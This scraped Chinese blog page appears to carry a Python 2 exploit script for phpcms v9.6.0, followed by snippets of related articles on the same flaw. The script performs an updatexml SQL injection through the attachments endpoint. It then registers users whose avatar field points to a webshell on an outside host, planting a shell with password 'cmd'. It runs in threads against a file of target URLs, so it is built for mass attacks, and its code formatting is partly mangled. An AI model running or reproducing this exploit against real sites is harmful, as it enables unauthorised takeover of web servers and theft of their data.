php %3cimg,phpcmsV9.6.0注入+前台getshell

最新推荐文章于 2023-01-21 22:35:36 发布
最新推荐文章于 2023-01-21 22:35:36 发布
阅读量3.3k 收藏
点赞数
文章标签: php %3cimg

# phpcms v9.6.0 sqli and getshell

# code by : whoam1

# blog : http://www.cnnetarmy.com

importrequests

importrandom

importstring

importhashlib

importre

importthreading

defsqli(host):

try:

url1 = '{}/index.php?m=wap&c=index&a=int&siteid=1'.format(host)

s =requests.Session()

req = s.get(url1)

flag = ''.join([random.choice(string.digits) for _ in range(2)])

flag_hash = hashlib.md5(flag).hexdigest()

url2 = '{}/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28md5%28{}%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26'.format(host,flag)

cookie = requests.utils.dict_from_cookiejar(s.cookies)

cookies = re.findall(r"siteid': '(.*?)'",str(cookie))[0]

data = {"userid_flash":cookies}

r = s.post(url=url2,data=data)

a_k = r.headers['Set-Cookie'][61:]

url3 = '{}/index.php?m=content&c=down&a_k={}'.format(host,a_k)

if flag_hash[16:] in s.get(url3).content:

print '[*] SQL injection Ok!'

else:

print '[!] SQL injection ERROR.'

except:

print 'requests error.'

pass

defgetshell(host):

try:

url = '%s/index.php?m=member&c=index&a=register&siteid=1' % host

flag = ''.join([random.choice(string.lowercase) for _ in range(8)])

flags = ''.join([random.choice(string.digits) for _ in range(8)])

headers = {

'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',

'Accept-Encoding':'gzip, deflate',

'Accept-Language':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',

'Upgrade-Insecure-Requests':'1',

'Content-Type': 'application/x-www-form-urlencoded',

'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'}

data = "siteid=1&modelid=11&username={}&password=ad{}min&email={}@cnnetarmy.com&info%5Bcontent%5D=%3Cimg%20src=http://www.cnnetarmy.com/soft/shell.txt?.php#.jpg>&dosubmit=1&protocol=".format(flag,flags,flag)

r = requests.post(url=url,headers=headers,data=data,timeout=5)

#print r.content

shell_path = re.findall(r'lt;img src=(.*?)>',str(r.content))[0]

print '[*] shell: %s  | pass is: cmd' % shell_path

withopen('sql_ok.txt','a')as tar:

tar.write(shell_path)

tar.write('\n')

except:

print 'requests error.'

pass

if __name__ == '__main__':

#sqli('http://127.0.0.1/phpcms960/install_package')

#getshell('http://127.0.0.1/phpcms960/install_package')

tsk = []

f =open('target.txt','r')

for i in f.readlines():

url = i.strip()

t = threading.Thread(target = sqli,args = (url,))

tsk.append(t)

for t in tsk:

t.start()

t.join(0.1)

weixin_39957186
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpcms漏洞_phpcms v9.6.0前台任意文件上传漏洞分析
weixin_39809793的博客
11-21 786
前言上一节我们分析了phpcms的后台get shell, 但是众所周知, 开发者对后台的漏洞 是不太上心的。因为管理员账号一般只有网站所有者才会有,如果入侵者能获取到管理员 账号,那么基本上意味着网站的所有信息都为他打开了大门,后台漏洞也就不那么重要了。 那么今天要分析的是phpccms 9.6.0版本的前台get shell. 漏洞的利用方式极其简单。 但是相对而言,代码的漏洞实现逻辑就没有前...
phpcms v9.6.0版本
09-09
phpcms v9.6.0的getshell漏洞就是一个实例,它提醒我们在使用开源软件时,不仅要关注功能,还要时刻关注安全更新,及时修复可能存在的安全隐患。 针对这个问题,开发者和安全研究人员可以深入研究说明.htm、readme...
PHPCMS9.6.0最新版SQL注入前台GETSHELL漏洞分析 (实验新课)
dfdhxb995397的博客
04-28 367
PHPCMS9.6.0最新版中,由于/modules/attachment/attachments.php的过滤函数的缺陷导致了可以绕过它的过滤机制形成SQL注入漏洞,可导致数据库中数据泄漏。 而且在前台上传文件处,没有对文件后缀进行严格的审查,导致可以前台GETSHELL,直接获取到了网站的权限。点击马上实验,i春秋安全专家带你体验漏洞成因及危害。 https://www.ichu...
PHPCMS v9.5.6 通杀getshell(前台)
aixuan9365的博客
05-27 505
漏洞url:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-062881.html 很好的fuzz思路。 文章提到:文件名前面的数字是被"干掉"字符的十进制数字,可以看出%81--%99会被干掉.该特性雷同Windows下对"."和" "(空格), ::$DATA的忽略。 这个特性可以用来绕过安全狗,比如 xxx.php. ...
phpcms9 从注入点入手和 从前台getshell
weixin_30256505的博客
07-15 165
弄了3天了 这个点 总结一下这三天的坑吧 0X01 注入点入手 /index.php?m=wap&c=index&a=init&siteid=1 获取cookie 传给 userid_flash=686dzK2pLsN_cv_pbJlCjvsm-ex_mCiOG90mXzt4 然后 构造SQL语句 /index.php?m=attachm...
Phpcms V9.6.0任意文件写入getshell
最新发布
主题模板站的博客
01-21 603
PHPcms v9.6的任意文件上传的漏洞,已经潜伏半年多的一个漏洞。该漏洞可以在用户注册界面以未授权的情况下实现任意文件上传。phpcms v9.6正常部署phpcms v9.6就好。复现过程中,可以在用户注册页面通过POST提交:在src后面跟上自己shell的url。注意是要.txt格式写的shell。网上已经有逆向分析的过程,这次我来正向的分析一下这个洞。首先看到用户注册的模块,位于phpcms/modules/member/index.php的register方法中。代码很多,一点点往下看:完成了
PHPCMS v9.6.0 GBK
10-23
 版本v9.6.0 功能变更及bug修正说明: 适配php5.5 php5.6 php7安装改成使用mysqli模块,不在使用mysql模块,默认使用mysqli模块。升级用户不受影响string2array函数改成json处理,为了保持兼容函数名称没做变动后台...
phpcmsv9商品模块+订单最新V9商城插件.zip
05-27
phpcmsv9商品模块+订单最新V9商城插件】是针对phpcmsV9内容管理系统的一个扩展功能,主要用于构建电子商务平台。这个插件集成了商品管理与订单处理的完整流程,为网站提供了完整的在线销售解决方案。下面将详细...
phpcmsv9.0任意文件上传漏洞解析
01-19
POST /phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1 Host: 192.168.0.109 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Fire...
phpcms v9 前台无限制GETSHELL
weixin_33842328的博客
04-03 1042
0x01:介绍PHPCMS V9(后面简称V9)采用PHP5+MYSQL做为技术基础进行开发。V9采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,优秀的二次开发能力,可满足所有网站的应用需求。 5年开发经验的优秀团队,在掌握了丰富的WEB开发经验和CMS产品开发经验的同时,勇于创新追求完美的设计理念,为全球多达10万...
PHPCMS v9.6 Getshell方法大全
hacker0ne的博客
11-15 5737
phpcms9.6.x后台getshell几种方法
phpcms v9前台getshell
weixin_34235457的博客
04-12 1306
PHPCMS是一款网站管理软件。该软件采用模块化开发,支持多种分类方式,使用它可方便实现个性化网站的设计、开发与维护。它支持众多的程序组合,可轻松实现网站平台迁移,并可广泛满足各种规模的网站需求,可靠性高,是一款具备文章、下载、图片、分类信息、影视、商城、采集、财务等众多功能的强大、易用、可扩展的优秀网站管理软件。看到到处都是这个漏洞的利用.加班完这个点看看触发点.主要的问题...
phpcms手工注入教程
浅笑996的博客
10-24 553
目标服务器(靶机):192.168.1.27 目标网站:http://192.168.1.27:8083 攻击机器:利用镜像win2k8创建云主机,并作为攻击机 步骤: 一、靶机操作 1、进入靶机,查看IP地址; 开始—运行,输入cmd回车,出现命令行窗口,输入:ipconfig 显示,靶机配置信息,记下以太网适配器下,IPv4地址(后面访问网页会用到)。 此处为192.168.1.27 2、启动...
php cms 代码注入,phpcms postclick注入0day利用代码漏洞预警 -电脑资料
weixin_42360703的博客
04-14 436
有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:问题函数\phpcms\modules\poster\index.phppublicfunctionposter_click(){$id=isset($_GET['id'])?intval($_GET['id']):0;$r=$this->db->get_one(array('id...
【学习笔记】PHPCMS v9.6.0 wap模块 SQL注入
chualam的博客
11-02 248
phpcms <php,代码审计| phpcms 9.6.2 任意文件下载与前台SQL注入
weixin_30995661的博客
04-08 283
0x00 背景最近做代码审计的时候发现phpcms 有更新,现在漏洞详情基本不公开,想要知道漏洞的利用方法只能自己审计了,通常可进行新旧版本的代码比较了,来定位旧版本的漏洞位置,便下载了phpcms 9.6.3与phpcms 9.6.1 和phpcms 9.6.2的源码进行比较和审计,发现phpcms 9.6.2 中存在任意文件下载补丁绕过和前台SQL注入,便撰写了本文做个记录,期待和师傅们的各种...
记一次phpcms9.6.3漏洞利用getshell到内网域控
plant1234的博客
06-25 2661
首现利用nmap扫描网段收集到主机ip地址: 扫描主机信息: 发现是win7的操作系统和开放80端口直接访问网站: 得到:扫描目录发现管理员登陆: 得到:弱口令:admin admin12345phpcms9.6.3后台getshell的洞网上有很多可以参考这篇博客: https://blog.csdn.net/weixin_42433470/article/details/112409431我这里利用的是:用户->管理员模块->添加会员模型得到shell:用蚁剑连接shell然后利用cs上线:利用的模块
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值